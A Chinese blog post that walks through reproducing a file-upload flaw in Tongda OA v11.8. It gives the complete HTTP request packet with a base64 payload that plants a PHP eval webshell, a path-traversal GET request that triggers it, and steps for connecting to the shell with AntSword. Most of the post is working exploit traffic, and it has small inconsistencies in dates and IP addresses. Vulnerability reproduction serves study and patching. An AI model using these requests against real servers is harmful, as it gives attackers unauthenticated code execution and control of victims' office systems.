通达OA-V11.8-api-ali.php文件上传漏洞复现

1、环境准备

  下载通达OA-v11.8版本(未打补丁版本)

  地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.8.exe

  VMvare_Win7环境

  安装通达OA11.8(D:/myoa)

  设置地址:localhost  端口:8081

  安装完毕,即可访问。

  

 

 

 

2、复现步骤

  2.1、向mobile/api/api.ali.phpf发送请求包

ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIEBldmFsKCRfUE9TVFsnc2hlbGwnXSk7IGVjaG8ibHVjayI7ID8+Jyk7"
进过base64解密,对应出:
file_put_contents('../../fb6790f4.php','<?php @eval($_POST['shell']); echo"luck"; ?>');

  上传进入一个php文件,也就是一个“一句话木马”

  完整的请求包如下所示:

POST /mobile/api/api.ali.php HTTP/1.1
Host: 192.168.1.33:8081  #自己如上设置的ip与端口
User-Agent: Go-http-client/1.1
Content-Length: 435
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Accept-Encoding: gzip

--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream

{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIEBldmFsKCRfUE9TVFsnc2hlbGwnXSk7IGVjaG8ibHVjayI7ID8+Jyk7","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--

 请求响应结果如下所示。 

 

 

 2.2、第二步,请求一个url,以Get请求方式,如下

http://192.168.1.33/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4

  其中,myoa/attach/approve_center为其路径地址   (也有可能默认路径为MYOA/attach/approve_center,版本不通,创建的默认路径也不同)

  2204:代表着其创建日期,22年4月

上传文件路径访问成功后,即可出现"+ok"提示。如图:

 

 

 

用蚁键连接,获取上传的shell文件===>http://192.168.1.23:8081/fb6790f4.php,已经被上传到webroot文件下,也就是根路径/

 

 至此成功!。


posted @ 2022-04-27 10:06  我就去睡觉  阅读(3271)  评论(8编辑  收藏  举报